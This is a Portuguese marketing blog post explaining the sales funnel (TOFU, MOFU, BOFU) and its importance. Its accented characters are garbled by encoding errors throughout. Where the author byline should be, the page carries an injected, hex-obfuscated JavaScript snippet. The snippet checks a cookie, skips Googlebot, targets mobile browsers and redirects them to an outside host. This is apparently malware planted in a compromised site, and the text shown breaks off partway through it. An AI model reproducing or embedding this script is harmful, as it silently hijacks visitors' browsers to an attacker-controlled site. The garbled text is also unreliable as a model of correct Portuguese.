Qual a importA?ncia do funil de marketing para sua empresa?


Nos dias de hoje, gerir clientes nA?o se resume a manter bancos de dados cheios de cadastros. Qual a finalidade desses bancos de dados, se os contatos que lA? constam nA?o sA?o bem trabalhados?

O consumidor estA? muito mais exigente, Ai?? imprescindAi??vel criar um relacionamento com ele, ouvi-lo e dar-lhe suporte.

Quer evitar perder clientes, e ao mesmo tempo, conquistar novos? EntA?o vocA? precisa entender o que Ai?? o funil de marketing e qual a sua sua real importA?ncia.

Saiba tudo sobre o funil de marketing

TambAi??m conhecido como funil de vendas, o funil de marketing Ai?? forma de representar toda a jornada do consumidor dentro do site da empresa, desde o momento em que ele entra no site pela primeira vez atAi?? a conclusA?o da compra, podendo ser estendido ao pA?s venda.

De modo geral, podemos definir o funil de marketing como ai???uma representaAi??A?o visual do processo de vendaai??? atravAi??s do qual Ai?? possAi??vel entender todo o processo e gerenciA?-lo.

Ai?? importante mencionar que, da mesma forma que no funil tradicional, o funil de marketing comeAi??a largo ai??i?? abrangendo todos os visitantes de um site ai??i?? e vai se estreitando ai??i?? atAi?? restar restar apenas as visitas que se converteram em clientes.

O funil de marketing, basicamente, Ai?? dividido em 3 partes:

topo (TOFU)
meio (MOFU)
fundo (BOFU)

Para uma estratAi??gia e campanhas de marketing assertivas, Ai?? preciso entender bem essas partes do funil, e criar aAi??Ai??es pensadas de acordo com cada etapa de venda.

Veja abaixo as etapas do funil de vendas:

As etapas do funil de marketing

Ao compreender adequadamente cada uma destas fases, serA? possAi??vel gerenciar um fluxo de vendas cada vez mais volumoso, confira:

 

Topo do Funil

O topo do funil trabalha pessoas que estA?o buscando a resoluAi??A?o de algum problema ou a satisfaAi??A?o de alguma necessidade.

Nessa etapa, as pessoas nA?o estA?o preparadas ou interessadas em adquirir produtos ou contratar os serviAi??os uma empresa, estA?o apenas buscando informaAi??Ai??es que as ajudem solucionar as suas dA?vidas.

Se o visitante encontrar um conteA?do que vA? de acordo com suas expectativas, ele avanAi??arA? para o meio do funil.

 

Meio do Funil

No meio do funil Ai?? a etapa do processo de vendas em que o usuA?rio estA? na fase de descoberta de qual a melhor maneira de solucionar o seu problema.

Nesse momento, o usuA?rio estA? analisando e comparando as opAi??Ai??es, decidindo se hA? a necessidade de realizar a compra de um produto ou contrataAi??A?o de um serviAi??o.

Essa Ai?? a etapa onde o visitante pode ser convertido em um lead, atravAi??s do cadastro em um formulA?rio, em troca do acesso a conteA?dos complementares (e-books, vAi??deos, infogrA?ficos, consultoria gratuita, etc.). A empresa deve disponibilizar conteA?dos que apresentem ao usuA?rio as opAi??Ai??es existentes para solucionar seu problema.

Depois de converter esses visitantes em leads, Ai?? preciso nutri-los atravAi??s de conteA?do, de modo a conseguir mais informaAi??Ai??es para descobrir se esse lead Ai?? realmente um potencial cliente e identificar o momento mais propAi??cio para uma proposta comercial.

 

Fundo do Funil

No fundo do funil, a empresa deve evidenciar que a sua soluAi??A?o, para o problema do usuA?rio, Ai?? a melhor opAi??A?o, e convencA?-lo a contratA?-la, iniciando o processo de tomada de decisA?o.

Essa etapa do funil de marketing possibilita trabalhar conteA?dos promocionais, divulgando a empresa, produtos ou serviAi??os; como tambAi??m, o departamento comercial entrar em contato com os leads para apresentar propostas.

A palavra de ordem Ai?? conversA?o de leads em clientes.

 

A ImportA?ncia do Funil de Marketing

Entender e acompanhar o funil de marketing Ai?? muito importante para sua empresa; com os dados obtidos torna-se possAi??vel criar estratAi??gias direcionadas, focadas na etapa exata em que cada potencial cliente estA? e utilizando as mais variadas formas de marketing digital.

AtravAi??s da anA?lise do funil, Ai?? possAi??vel identificar o momento em que o usuA?rio estA? pronto para fazer a compra, e entA?o, notificar o gerente de vendas e a equipe comercial para fazer o contato e apresentar a proposta.

O funil tem como principais objetivos:

  • compreender o processo de compra
  • atrair visitas
  • converter visitas em leads
  • converter leads em clientes
  • fidelizar clientes

O acompanhamento do funil de vendas aliado Ai?? metodologia do inbound marketing, alAi??m de gerar novos clientes, diminui o custo da venda e aumenta o reconhecimento da marca.

 

 

Por var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 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